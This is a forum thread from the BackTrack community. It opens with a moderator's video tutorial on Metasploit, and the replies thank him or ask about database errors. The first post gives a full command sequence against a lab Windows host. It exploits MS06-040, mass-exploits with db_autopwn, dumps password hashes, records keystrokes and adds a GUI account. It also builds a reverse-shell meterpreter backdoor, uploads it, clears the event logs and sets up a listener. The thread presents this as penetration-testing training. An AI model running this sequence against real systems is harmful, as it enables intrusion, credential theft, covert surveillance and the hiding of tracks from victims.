Page 1 of 2 12 LastLast
Results 1 to 10 of 16

Thread: [Video] Messing with Metasploit

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Messing with Metasploit

    Links
    Watch videoon-line: http://g0tmi1k.blip.tv/file/3308154
    Download video: http://www.mediafire.com/?oxsal2u1dr81b0a
    What is this?
    A basic guide to show how powerful the metasploit framework is!
    >Setup & run a exploit.
    >Use nmap to scan.
    >Use db_autopwn (to exploit the masses!)
    >Gather information about the target
    >Read, download and upload files
    >Run scripts
    >Create & use a backdoor.

    What do I need?
    > Metasploit Framework
    > (Vulnerable) target (e.g. Windows XP SP0/1)


    Software
    Name: Metasploit
    Version: 3.3.3
    Home Page: http://www.metasploit.com/
    Download Link: http://www.metasploit.com/framework/download/


    Commands:
    Code:
    cd /pentest/exploits/framework3/
    ./msfconsole
    db_create g0tmi1k
    db_hosts
    db_add_host 10.0.0.4
    db_hosts
    
    #show                             ##Show everything! [wasn't in video]
    
    use windows/smb/ms06_040_netapi
    #use windows/dcerpc/ms03_026_dcom ##Different exploit, didn't find it as reliable
    
    #set paypload windows/shell_bind_tcp         ##Could do a windows shell (not as powerful as meterpreter)
    #set payload windows/meterpreter/reverse_tcp ##Could do a meterpreter (but we do it later!)
    set payload windows/vncinject/bind_tcp
    show options
    set lhost 10.0.0.6
    show options
    exploit
    
    db_del_host 10.0.0.4
    db_hosts
    db_nmap -n 1O 10.0.0.1-5
    db_hosts
    
    db_autopwn -t -p -e
    
    sessions -l
    sessoins -i 1
    
    sysinfo
    #ipconfig   ##IP information [wasn't in video]
    idletime
    ps
    kill [number]
    getuid
    #migrate // getsystem // use priv  ##If the exploit doesn't have system privileges! [wasn't in video]
    hashdump
    # execute                  ## Runs a command [wasn't in video]
    shell
    pwd
    ls
    cd C:/
    ls
    mkdir g0tmi1k
    ls
    cd g0tmi1k
    cat C:/boot.ini
    download C:/boot.ini /tmp/boot.ini
    ./msfpayload windows/meterpreter/reverse_tcp lhost=10.0.0.6 X > /tmp/g0tmi1k.exe
    upload /tmp/g0tmi1k.exe C:/g0tmi1k/g0tmi1k.exe
    run getgui -u g0tmi1k -p haveyou
    run keylogrecorder
    ## More scripts: /pentest/exploits/framework3/scripts/meterpreter
    #run scraper    ##Gets information about target, dumps reg etc[wasn't in video]
    #run vnc        ##Setups VNC [wasn't in video]
    #run uploadexec ##Upload and run a program [wasn't in video]
    clearev
    exit -y
    exit -y
    
    ##Start fresh for the backdoor!
    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 10.0.0.6
    exploit
    
    ## Somehow run: C:\g0tmi1k\g0tmi1k.exe
    Notes:
    Made a few slip-ups in the video and something went wrong with keylogrecorder.
    This is only the basic stuff - it can do ALOT more! See commands for a few more basic things which I didnt do.

    Song: Vicky Devine - Facing The Truth
    Video length: 9:07
    Capture length: 29:20

    Blog Post: http://g0tmi1k.blogspot.com/2010/03/...etasploit.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2346-%5Bvideo%5D-messing-metasploit.html
    Last edited by g0tmi1k; 03-05-2011 at 02:59 PM.
    Have you...g0tmi1k?

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    13

    Thumbs up Re: [Video] Messing with Metasploit

    Very Nice! I know I'm kinda late on this, but think you deserve more credit, and at least 1 reply. You help guys like me out tremendously!
    Keep the videos coming

  3. #3
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Messing with Metasploit

    Thanks for the thanks (=
    Have you...g0tmi1k?

  4. #4
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    7

    Default Re: [Video] Messing with Metasploit

    Nice video, every beginner should see this video.
    It just explain everything of the basics from metasploit.[BOOK][/BOOK]

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Messing with Metasploit

    Quote Originally Posted by errorman View Post
    Nice video, every beginner should see this video.
    It just explain everything of the basics from metasploit.[BOOK][/BOOK]
    Thanks for the thanks!
    That was the aim of the vidoe! (=
    Have you...g0tmi1k?

  6. #6
    Just burned his ISO pheaneasphreak's Avatar
    Join Date
    Aug 2010
    Location
    Germany
    Posts
    1

    Default Re: [Video] Messing with Metasploit

    Hi everyone. Yesterday i was trying to re-enact this scenario but when it comes to msfconsole i got the following error.

    msf > db_create pheaneasphreak

    Warning: The db_create command is deprecated, use db_connect instead.
    The database and schema will be created automatically by db_connect. If db_connect fails
    to create the database, create it manually with your DBMS' s administration tools.

    createdb: could not connect to database postgres: could not connect to server: No such file or directory
    Is the server running locally and accepting connections to Unix domain socket
    "/var/run/postgresql/ .s.PGSQL.5432" ?
    Error while running command db_create: Failed to connect to database: could not connect to server:
    connection refused.
    Is the server running on host "127.0.01" and accepting TCP/IP connections on port 5432?


    What does that mean and how can i fix that? I am new to this Backtrack thing.Thanks in advance


    pheaneasphreak

  7. #7
    Member
    Join Date
    Feb 2010
    Posts
    50

    Default Re: [Video] Messing with Metasploit

    dear sir,

    when i was typing db_create k4t41, it was appear a command like this : http://i34.tinypic.com/5yaj9z.png
    could someone tell me what was the meaning?

    tks

  8. #8
    Member
    Join Date
    Feb 2010
    Posts
    50

    Default Re: [Video] Messing with Metasploit

    dear sir,

    when i was typing db_create k4t41 at metasploit, it was appear command like this : http://i34.tinypic.com/5yaj9z.png

    please tell me what should i do

    tks

  9. #9
    Just burned his ISO
    Join Date
    May 2010
    Posts
    1

    Default Re: [Video] Messing with Metasploit

    thanks for the video

  10. #10
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Messing with Metasploit

    What version of BackTrack are you using?
    Have you got postgres installed?
    What is the output from running
    Code:
    db_driver
    ?
    *Friendly reminder - could you use CODE tags this time?!*
    Have you...g0tmi1k?

Page 1 of 2 12 LastLast

Similar Threads

  1. Replies: 2
    Last Post: 08-23-2010, 10:53 AM
  2. [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. Replies: 0
    Last Post: 03-16-2010, 01:00 PM
  4. Metasploit auxilary file_autopwn module - Video Tutorial
    By brtw2003 in forum BackTrack Videos
    Replies: 5
    Last Post: 03-13-2010, 11:20 AM
  5. [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •